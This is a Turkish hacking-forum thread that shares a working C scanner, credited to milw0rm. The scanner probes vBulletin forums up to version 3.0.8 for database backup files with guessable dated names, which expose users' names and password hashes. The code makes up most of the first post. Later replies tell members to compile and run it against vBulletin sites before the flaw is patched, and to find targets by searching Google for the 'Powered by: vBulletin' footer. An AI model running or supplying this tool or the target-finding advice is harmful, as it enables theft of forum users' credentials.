V Bulletin Backup.Php Açığı

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Arlong
    Arlong's avatar
    Kayıt Tarihi: 14/Şubat/2005
    Erkek
    başka bi yerden buldum c/p yaptım açık taze daha

    vBulletin Forum ve Portal scriptinin son sürümü ( 3.0.8 ) de dahil olmak üzere tüm versiyonlarında 'backup.php' yedekleme sisteminden doğan bir açık tespit edildi.

    'backup.php' scripti veritabanı yedeği oluştururken herhangi bir şifre veya encryption sistemi kullanmıyor.Eğer sistem admini scriptin default klasör yollarını değişmediyse dışardan herhangi bir kullanıcı bu dosya adını tahmin edebilir böylece bilgisayarına indirip o anki tüm kullanıcıların kullanıcı adı , şifre hashleri ve daha birçok bilgisine ulaşabilir.

    Exploit ;


    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <stdio.h>
    #include <unistd.h>

    #define SERVER_PORT 80

    char *getdate(int b){
    static char datestring[40];
    time_t ttt;
    int minustime;
    minustime=86400 * b;
    ttt=time(NULL)- minustime;
    strftime (datestring, sizeof(datestring), "%m-%d-%Y", localtime(&ttt));
    printf("Searching: forumbackup-%s.sql\n", datestring);
    return(datestring);
    }

    char *getdate2(int b){
    static char datestring[40];
    time_t ttt;
    int minustime;
    minustime=86400 * b;
    ttt=time(NULL)- minustime;
    strftime (datestring, sizeof(datestring), "%Y-%d-%m", localtime(&ttt));
    printf("Searching: forumbackup-%s.sql\n", datestring);
    return(datestring);
    }

    char *getdate3(int b){
    static char datestring[40];
    time_t ttt;
    int minustime;
    minustime=86400 * b;
    ttt=time(NULL)- minustime;
    strftime (datestring, sizeof(datestring), "%d-%m-%Y", localtime(&ttt));
    printf("Searching: forumbackup-%s.sql\n", datestring);
    return(datestring);
    }

    char *getdate4(int b){
    static char datestring[40];
    time_t ttt;
    int minustime;
    minustime=86400 * b;
    ttt=time(NULL)- minustime;
    strftime (datestring, sizeof(datestring), "%m.%d.%Y", localtime(&ttt)); // hals1
    printf("Searching: forumbackup-%s.sql\n", datestring);
    return(datestring);
    }

    char *getdate5(int b){
    static char datestring[40];
    time_t ttt;
    int minustime;
    minustime=86400 * b;
    ttt=time(NULL)- minustime;
    strftime (datestring, sizeof(datestring), "%Y.%d.%m", localtime(&ttt)); // hals1
    printf("Searching: forumbackup-%s.sql\n", datestring);
    return(datestring);
    }

    char *getdate6(int b){
    static char datestring[40];
    time_t ttt;
    int minustime;
    minustime=86400 * b;
    ttt=time(NULL)- minustime;
    strftime (datestring, sizeof(datestring), "%d.%m.%Y", localtime(&ttt)); // hals1
    printf("Searching: forumbackup-%s.sql\n", datestring);
    return(datestring);
    }

    char *getdate7(int b){
    static char datestring[40];
    time_t ttt;
    int minustime;
    minustime=86400 * b;
    ttt=time(NULL)- minustime;
    strftime (datestring, sizeof(datestring), "%d%m%Y", localtime(&ttt)); // Tyn0r
    printf("Searching: forumbackup-%s.sql\n", datestring);
    return(datestring);
    }

    main(int argc, char *argv[]) {

    char buffer[1000],host[255],path[255],dog[255],c;
    int sd, rc, i=0, d=0, b;
    struct sockaddr_in localAddr, servAddr;
    struct hostent *h;

    char *http =
    "Accept: */*\r\n"
    "Accept-Language: en-us,en;q=0.5\r\n"
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
    "User-Agent: we want your backups - milw0rm\r\n"
    "Connection: close\r\n\r\n";

    if ( argc != 5) {
    printf("vBulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! milw0rm.com\n" );
    printf("usage: %s -h hostname/ip -p /path/ \n",argv[0]);
    exit(0);
    }


    while ((c = getopt (argc, argv, "h:p:" ) ) != EOF)
    switch(c)
    {
    case 'h':
    strncpy(host,optarg,sizeof(host));
    break;
    case 'p':
    strncpy(path,optarg,sizeof(path));
    break;
    }

    h = gethostbyname(host);

    if(h==NULL) {
    printf("Unknown Host '%s'\n",host);
    exit(1);
    }

    printf("Trying To Connect To [%s]\n",host);
    while(1){
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
    servAddr.sin_port = htons(SERVER_PORT);
    sd = socket(AF_INET, SOCK_STREAM, 0);

    if(sd<0) {
    perror("Can Not Open The Socket\n" ) ;
    exit(1);
    }

    localAddr.sin_family = AF_INET;
    localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
    localAddr.sin_port = htons(0);

    rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));

    if(rc<0) {
    printf("%d: cannot bind port TCP %u\n",sd,SERVER_PORT);
    perror("error" );
    exit(1);
    }

    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));

    if(rc<0) {
    perror("cannot connect\n" ) ;
    exit(1);
    }
    memset(buffer,0,sizeof(buffer));

    if ( d == 0 ) {
    snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate(i),host,http);
    } else if ( d == 1 ) {
    snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate2(i),host,http);
    } else if ( d == 2 ) {
    snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate3(i),host,http);
    } else if ( d == 3 ) {
    snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate4(i),host,http);
    } else if ( d == 4 ) {
    snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate5(i),host,http);
    } else if ( d == 5 ) {
    snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate6(i),host,http);
    } else if ( d == 6 ) {
    snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate7(i),host,http);
    }

    rc = send(sd,buffer, strlen(buffer), 0);
    memset(buffer,0,sizeof(buffer));

    while(1)
    {
    rc=recv(sd,buffer,sizeof(buffer),0);
    if(strstr(buffer,"404" )) break;
    if(strstr(buffer,"200 OK" ) )
    {
    if ( d == 0 ) {
    printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate(i));
    }
    if ( d == 1 ) {
    printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate2(i));
    }
    if ( d == 2 ) {
    printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate3(i));
    }
    if ( d == 3 ) {
    printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate4(i));
    }
    if ( d == 4 ) {
    printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate5(i));
    }
    if ( d == 5 ) {
    printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate6(i));
    }
    if ( d == 6 ) {
    printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate7(i));
    }
    exit(0);
    }
    memset(buffer,0,sizeof(buffer));
    }
    close(sd);

    if ( d < 6 ) {
    d++;
    } else {
    d=0;
    i++;
    }
    }
    }



    kaynak:cigicigi.com,e-hack.org
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    h2akan
    h2akan's avatar
    Kayıt Tarihi: 01/Eylül/2005
    Erkek
    selam üstat saolasın ama bu açığı nasıl uygulayacağız onuda anlatırsan çok sevinirim ..............
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Arlong
    Arlong's avatar
    Kayıt Tarihi: 14/Şubat/2005
    Erkek
     hakan wampirein bu konuda baya bi dokumanı var onları oku
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tagext
    tagext's avatar
    Üstün Hizmet Madalyası Başarı Madalyası
    Kayıt Tarihi: 25/Temmuz/2002
    Erkek
    kodu compile edip çalıştırcan

    ftw
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Kayıt Tarihi: 09/Ağustos/2005
    Erkek

    yaw bununla ne tür siteleri nası hekliycez?napcam ben bu exploiti?


    Amphetamine Logic.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Arlong
    Arlong's avatar
    Kayıt Tarihi: 14/Şubat/2005
    Erkek
    v bulletin kurulu sitelerde deniyecen açık yakında kapanır
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    reder
    reder's avatar
    Kayıt Tarihi: 23/Ağustos/2005
    Erkek
    ßu ne c pl ?
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Kayıt Tarihi: 09/Ağustos/2005
    Erkek
    vb li siteleri nerden bulcaz?

    Amphetamine Logic.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Arlong
    Arlong's avatar
    Kayıt Tarihi: 14/Şubat/2005
    Erkek
    googledan aratırsın '   Powered by: vBulletin Version 3   ' buna benzer bişeyler yaz
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Kayıt Tarihi: 09/Ağustos/2005
    Erkek
    eywallah son bişi sorcam bunu perl ilemi yapıyok? komutlar ne?

    Amphetamine Logic.
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    reder
    reder's avatar
    Kayıt Tarihi: 23/Ağustos/2005
    Erkek
    ßide nede derliyeceğimiz söylersen seviniriz shell perl vs. ?
Toplam Hit: 1868 Toplam Mesaj: 16